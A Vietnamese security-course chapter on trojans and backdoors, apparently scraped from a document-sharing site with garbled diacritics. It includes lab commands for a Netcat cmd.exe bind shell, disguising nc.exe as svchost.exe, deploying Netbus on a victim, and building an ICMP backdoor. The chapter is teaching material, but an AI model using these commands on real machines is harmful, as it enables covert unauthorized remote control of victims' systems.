Tải bản đầy đủ (.pdf) (40 trang)
  1. Trang chủ
    2. >>
  2. Công Nghệ Thông Tin
    3. >>
  3. An ninh - Bảo mật

athena-chapter 6 - trojan and backdoor

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (4.69 MB, 40 trang )


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA
CHAPTER 6: TROJAN AND BACKDOOR

I. Trojan và backdoor :
- Trojan horse l chương trnh my tnh thưng đưc n dưi cc chương trnh khc,
c cha code n đưc vit đ khai thc lỗ hổ ng hoặ c gây nguy hạ i cho hệ điề u hà nh,
ch yu dng đ ăn cp cc thông tin nhy cm như password account,file
- Backdoor là chương trì nh to kt ni t xa. Hacker thườ ng sử dụ ng để kế t nố i lấ y
file hoặ c điề u khiể n tớ i má y củ a nạ n nhân m c th bypass qu trnh
authentication.Hacker thưng ci đt trên my ca nn nhân đ d dng kt ni cho
lầ n xâm nhậ p sau.
- Spyware chương trì nh thu thậ p thông tin về user , hot đng ngm đ thu thp v
cc hot đng ca ngưi dng. Kế t hợ p vớ i Adware để quả ng cá o (pop-up) cho cá c
site thương mạ i
- Điề u kiệ n cầ n củ a Trojan và Backdoor:
+ Phi c trên my ca victim(ci đặ t hoặ c copy và o má y victim)
- Trojan-backdoor thườ ng đượ c nhú ng phầ n server.exe trong cá c chương trì nh hợ p lệ
đ la nn nhân v hacker s dng phn client đ to kt ni ti nn nhân khi nn
nhân online.
- Rấ t dễ tạ o Trojan từ cá c tool kit có rấ t nhiề u trên Internet như Stealth,Beat
II. Cc kiu Trojan-Backdoor :
- Trojan thườ ng có mộ t hoặ c nhiề u tí nh năng :
+ Remote connect Access : kế t nố i và điề u khiể n từ xa
+ Sending data : gử i file giữ a hacker và victim
+ Destructive and DoS : ph hy file hoc my v DoS
+ Security software disable : tắ t firewall,antivirus software để dễ dà ng kế t nố i
III. Cch phng chng :
- Sử dụ ng cá c phầ n mề m Trojan detection,antivirus update thườ ng xuyên


- Kế t hợ p cá c biệ n phá p IDS để phá t hiệ n Trojan
- Thườ ng xuyên kiể m tra cá c port mở trên má y

www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA
IV. Lab :
1. Netcat: l trojan backdoor đơn giả n nhưng hữ u hiệ u download tạ i :
. Netcat chạ y đượ c trên Windows và
Linux
a. Trên Windows : không cầ n cà i đặ t,chy trên command-line
b. Trên Linux :
- Gii nn v ci đt vi lnh tar,./configure,make


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA

- Cc option ca Netcat :



www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA

- Chy Netcat trên Windows :
+ nc –l –p 12345 –d –e cmd.exe –L :
> -l: chuyn sang ch đ lng nghe,> -p 12345 : lng nghe trên port 12345, > -d : chy
độ c lậ p không cầ n console(command-line console), > -e cmd.exe : gi cmd.exe khi
kế t nố i, > -L : tự độ ng chạ y lạ i mỗ i khi kế t thú c vớ i cù ng cá c lnh như trưc.


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA

- To kt ni t my linux : nc IP(my cầ n kế t nố i) port(lắ ng nghe)


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA

- Hacker có thể rename nc.exe thà nh svchost.exe để lừ a như 1 process củ a hệ thố ng và
lắ ng nghe trên cá c common port để trá nh bị phá t hiệ n

www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA



www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA

2. Netbus : trojan nổ i tiế ng đượ c viế t ra từ năm 1998. Netbus khi chạ y sẽ tự độ ng cà i
đặ t và đưa và o registry để tự độ ng khở i độ ng cù ng OS


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA

- Chy file patch.exe trên má y nạ n nhân.Mặ c đị nh Netbus lắ ng nghe trên port 12345
nhưng có thể thay đổ i và tạ o password để chỉ c đng Hacker c th to kt ni ti.

www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA

- Connect đế n Netbus : nhậ p IP má y muố n kế t nố i,port lắ ng nghe,password nế u có

- Sau khi kế t nố i xong sẽ hiệ n tì nh trạ ng phí a dướ i và hacker có thể toà n quyề n quả n
l my ca nn nhân.


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA


3. ICMP Trojan : chương trì nh Trojan-backdoor tạ o cổ ng hậ u và truyề n data bằ ng
ICMP protocol, platform Windows,Linux,size chỉ 5k. Download tạ i :
.Loi Trojan
ny không đ li du tch g tr vic thy thnh thong cc gi tin ping đưc gi ti
my ca nn nhân.
- Ci đt v chy phn server trên Linux :
+ tar –vxfz icmp-backdoor.tar.gz
+ cd icmp-backdoor
+ make server
+ ./ibd-server 0

www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA



www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA

- Bt Ethereal đ capture qu trnh truyn data ca icmp-backdoor

www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA

- Kế t nố i tớ i server từ má y hacker :
+ tar –vxfz icmp-backdoor.tar.gz
+ cd icmp-backdoor
+ make client
+ ./ibd-client 192.168.3.103(IP má y kế t nố i) 8(Kiể u protocol)

www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng

ATHENA


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA


www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477
Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng
ATHENA

Tài liệu liên quan

Tài liệu bạn tìm kiếm đã sẵn sàng tải về

Tải bản đầy đủ ngay
×